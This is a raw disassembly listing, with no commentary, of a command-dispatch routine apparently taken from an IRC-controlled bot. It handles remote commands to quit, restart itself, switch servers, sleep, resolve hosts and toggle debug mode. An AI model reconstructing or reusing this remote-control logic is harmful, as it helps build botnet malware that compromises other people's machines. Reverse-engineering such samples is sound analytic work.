sub eax, ds:dword_419C88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B44C
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_401146
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B44C: ; CODE XREF: sub_40A9CF+A6A�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B47D
push 0
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B47D: ; CODE XREF: sub_40A9CF+A90�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C70
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4AE
push 1
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40A9CF+AC1�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C64
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4D5
lea eax, [ebp+var_1A4]
push eax
call sub_409BF1
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4D5: ; CODE XREF: sub_40A9CF+AF2�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C5C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B508
push offset dword_41F018
push offset dword_419C4C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_40A9CF+B19�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C40
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B536
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413FE7
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_40A9CF+B4C�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C34
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C28
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5A7
loc_40B575: ; CODE XREF: sub_40A9CF+B7A�j
; sub_40A9CF+B8F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413AB0
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5A7: ; CODE XREF: sub_40A9CF+BA4�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5CE
lea eax, [ebp+var_1A4]
push eax
call sub_41417D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40A9CF+BEB�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B631
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz short loc_40B61B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_41673F
pop ecx
test eax, eax
jnz short loc_40B601
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B601: ; CODE XREF: sub_40A9CF+C2B�j
push 104h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_41ED10
call sub_407A56
add esp, 0Ch
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B61B: ; CODE XREF: sub_40A9CF+C1B�j
push offset dword_41EBFC
push offset dword_41ED10
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B62C: ; CODE XREF: sub_40A9CF+C4A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_40A9CF+C12�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BE8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B678
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_414600
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A9CF+C75�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BE0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B791
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B69F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40A9CF+CC9�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
shl eax, 1
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A68], eax
cmp [ebp+var_5A68], 0
jnz short loc_40B6C8
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40A9CF+CF2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_5A68]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40EB4E
add esp, 0Ch
push [ebp+var_5A68]
push offset dword_419BC4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A68]
call sub_416B4C ; free
pop ecx
push 1000h
lea eax, [ebp+var_1A60]
push eax
call sub_4104A3
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp+var_A60], eax
and [ebp+var_1A64], 0
jmp short loc_40B743
; ---------------------------------------------------------------------------
loc_40B736: ; CODE XREF: sub_40A9CF+D9B�j
mov eax, [ebp+var_1A64]
inc eax
mov [ebp+var_1A64], eax
loc_40B743: ; CODE XREF: sub_40A9CF+D65�j
cmp [ebp+var_1A64], 186A0h
jge short loc_40B76C
push 1000h
lea eax, [ebp+var_5A64]
push eax
lea eax, [ebp+var_1A60]
push eax
call sub_40EB4E
add esp, 0Ch
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40A9CF+D7E�j
call sub_416B64 ; clock
sub eax, [ebp+var_A60]
push eax
push offset aItTookMeUms_ ; "It took me %ums."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B791: ; CODE XREF: sub_40A9CF+CBC�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419BA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B823
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B7B4
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A9CF+DDE�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A6C], eax
cmp [ebp+var_5A6C], 0
jnz short loc_40B7DB
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40A9CF+E05�j
push [ebp+var_5A6C]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40E9C9
pop ecx
pop ecx
mov ecx, [ebp+var_5A6C]
and byte ptr [ecx+eax], 0
push [ebp+var_5A6C]
push offset dword_419B88
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A6C]
call sub_416B4C ; free
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B823: ; CODE XREF: sub_40A9CF+DD5�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B78
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B873
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40B85C
push offset dword_41F018
push offset dword_419B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40A9CF+E70�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41F018
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B86E: ; CODE XREF: sub_40A9CF+E8B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_40A9CF+E67�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B58
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B899
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4097A7
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_40A9CF+EB7�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B4C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8C7
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403FE5
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_40A9CF+EDD�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B3C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8ED
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4098F3
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8ED: ; CODE XREF: sub_40A9CF+F0B�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B30
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B91B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406722
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B91B: ; CODE XREF: sub_40A9CF+F31�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B20
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B949
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_412F07
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_40A9CF+F5F�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B14
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B98A
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A1A7
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B98A: ; CODE XREF: sub_40A9CF+F8D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419B08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9BF
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A50E
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9BF: ; CODE XREF: sub_40A9CF+FCE�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9F5
push offset dword_41EBFC
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_40D6CB
pop ecx
pop ecx
push 36EE80h
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9F5: ; CODE XREF: sub_40A9CF+1003�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419ADC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BA79
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA18
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40A9CF+1042�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41DB88
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BA41
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63EC], eax
jmp short loc_40BA4B
; ---------------------------------------------------------------------------
loc_40BA41: ; CODE XREF: sub_40A9CF+1062�j
mov [ebp+var_63EC], offset byte_41DF00
loc_40BA4B: ; CODE XREF: sub_40A9CF+1070�j
push [ebp+var_63EC]
push offset dword_41EE18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EE18
push offset dword_41DB88
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA79: ; CODE XREF: sub_40A9CF+1039�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BADB
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA9C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40A9CF+10C6�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BAB3
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63F0], eax
jmp short loc_40BABD
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_40A9CF+10D4�j
mov [ebp+var_63F0], offset byte_41DF00
loc_40BABD: ; CODE XREF: sub_40A9CF+10E2�j
push [ebp+var_63F0]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BADB: ; CODE XREF: sub_40A9CF+10BD�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB15
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BAFE
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BAFE: ; CODE XREF: sub_40A9CF+1128�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AB0
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB15: ; CODE XREF: sub_40A9CF+111F�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419AA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB6C
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BB38
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40A9CF+1162�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_5A70], eax
cmp [ebp+var_5A70], 927C0h
jle short loc_40BB5B
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB5B: ; CODE XREF: sub_40A9CF+1185�j
push [ebp+var_5A70]
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_40A9CF+1159�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A9C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBB0
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BB93
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BB98
loc_40BB93: ; CODE XREF: sub_40A9CF+11B9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40A9CF+11C2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D4AB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBB0: ; CODE XREF: sub_40A9CF+11B0�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBF4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BBD7
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BBDC
loc_40BBD7: ; CODE XREF: sub_40A9CF+11FD�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: sub_40A9CF+1206�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBF4: ; CODE XREF: sub_40A9CF+11F4�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BC28
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40BC17
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40A9CF+1241�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40A9CF+1238�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCB2
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BC84
cmp ds:dword_41DF08, 0
jz short loc_40BC5B
mov [ebp+var_63F4], offset aOn ; "on"
jmp short loc_40BC65
; ---------------------------------------------------------------------------
loc_40BC5B: ; CODE XREF: sub_40A9CF+127E�j
mov [ebp+var_63F4], offset aOff ; "off"
loc_40BC65: ; CODE XREF: sub_40A9CF+128A�j
push [ebp+var_63F4]
push offset aDebugModeIsS_ ; "Debug mode is %s."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC84: ; CODE XREF: sub_40A9CF+1275�j
push offset aOn ; "on"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40BCA6
mov ds:dword_41DF08, 1
jmp short loc_40BCAD
; ---------------------------------------------------------------------------
loc_40BCA6: ; CODE XREF: sub_40A9CF+12C9�j
and ds:dword_41DF08, 0
loc_40BCAD: ; CODE XREF: sub_40A9CF+12D5�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCB2: ; CODE XREF: sub_40A9CF+126C�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCD9
lea eax, [ebp+var_1A4]
push eax
call sub_415DFD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCD9: ; CODE XREF: sub_40A9CF+12F6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A44
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD13
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BCFC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: sub_40A9CF+1326�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_419A3C
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD13: ; CODE XREF: sub_40A9CF+131D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A30
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A24
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD62
loc_40BD52: ; CODE XREF: sub_40A9CF+1357�j
; sub_40A9CF+136C�j
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD62: ; CODE XREF: sub_40A9CF+1381�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A10
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BDC9
push 104h
lea eax, [ebp+var_5B74]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
push 0
push 0
push 0
lea eax, [ebp+var_5B74]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
cmp eax, 20h
ja short loc_40BDB6
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDB6: ; CODE XREF: sub_40A9CF+13E0�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
push 0
call ds:dword_41705C ; ExitProcess
loc_40BDC9: ; CODE XREF: sub_40A9CF+13A6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419A04
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE19
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BDEC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDEC: ; CODE XREF: sub_40A9CF+1416�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
push offset dword_4199D4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_40A9CF+140D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE38
call sub_407148
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE38: ; CODE XREF: sub_40A9CF+145D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199BC
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BE62
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199B0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE7B
loc_40BE62: ; CODE XREF: sub_40A9CF+147C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_401D6E
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE7B: ; CODE XREF: sub_40A9CF+1491�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4199A8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEA9
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40CEB0
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEA9: ; CODE XREF: sub_40A9CF+14BF�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41999C
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BED3
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41998C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEFD
loc_40BED3: ; CODE XREF: sub_40A9CF+14ED�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_40D6CB
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D366
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEFD: ; CODE XREF: sub_40A9CF+1502�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41996C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C0D9
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BF29
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DF00
loc_40BF29: ; CODE XREF: sub_40A9CF+154E�j
lea eax, [ebp+var_5B78]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz loc_40C0BA
mov eax, [ebp+var_5B78]
mov [ebp+var_5B7C], eax
loc_40BF54: ; CODE XREF: sub_40A9CF+16D8�j
cmp [ebp+var_5B7C], 0
jz loc_40C0AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+10h]
mov eax, [ebp+var_5B7C]
push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jnz loc_40C098
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 2
jnz short loc_40BFEA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40BFBA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63F8], eax
jmp short loc_40BFC4
; ---------------------------------------------------------------------------
loc_40BFBA: ; CODE XREF: sub_40A9CF+15DB�j
mov [ebp+var_63F8], offset dword_419968
loc_40BFC4: ; CODE XREF: sub_40A9CF+15E9�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63F8]
push offset dword_419944
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C08D
; ---------------------------------------------------------------------------
loc_40BFEA: ; CODE XREF: sub_40A9CF+15CE�j
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 17h
jnz short loc_40C03E
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C011
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63FC], eax
jmp short loc_40C01B
; ---------------------------------------------------------------------------
loc_40C011: ; CODE XREF: sub_40A9CF+1632�j
mov [ebp+var_63FC], offset dword_419968
loc_40C01B: ; CODE XREF: sub_40A9CF+1640�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63FC]
push offset dword_419920
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_40C08D
; ---------------------------------------------------------------------------
loc_40C03E: ; CODE XREF: sub_40A9CF+1625�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C059
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6400], eax
jmp short loc_40C063
; ---------------------------------------------------------------------------
loc_40C059: ; CODE XREF: sub_40A9CF+167A�j
mov [ebp+var_6400], offset dword_419968
loc_40C063: ; CODE XREF: sub_40A9CF+1688�j
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+4]
push [ebp+var_6400]
push offset dword_4198EC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
loc_40C08D: ; CODE XREF: sub_40A9CF+1616�j
; sub_40A9CF+166D�j
push 3E8h
call ds:dword_41709C ; Sleep
loc_40C098: ; CODE XREF: sub_40A9CF+15BE�j
mov eax, [ebp+var_5B7C]
mov eax, [eax+1Ch]
mov [ebp+var_5B7C], eax
jmp loc_40BF54
; ---------------------------------------------------------------------------
loc_40C0AC: ; CODE XREF: sub_40A9CF+158C�j
push [ebp+var_5B78]
call ds:dword_41DF5C ; freeaddrinfo
jmp short loc_40C0D4
; ---------------------------------------------------------------------------
loc_40C0BA: ; CODE XREF: sub_40A9CF+1573�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C0D4: ; CODE XREF: sub_40A9CF+16E9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40A9CF+1541�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4198C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C1D4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40C105
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DF00
loc_40C105: ; CODE XREF: sub_40A9CF+172A�j
lea eax, [ebp+var_5F84]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz loc_40C1B5
push 4
push 0
push 0
push 401h
lea eax, [ebp+var_6388]
push eax
mov eax, [ebp+var_5F84]
push dword ptr [eax+10h]
mov eax, [ebp+var_5F84]
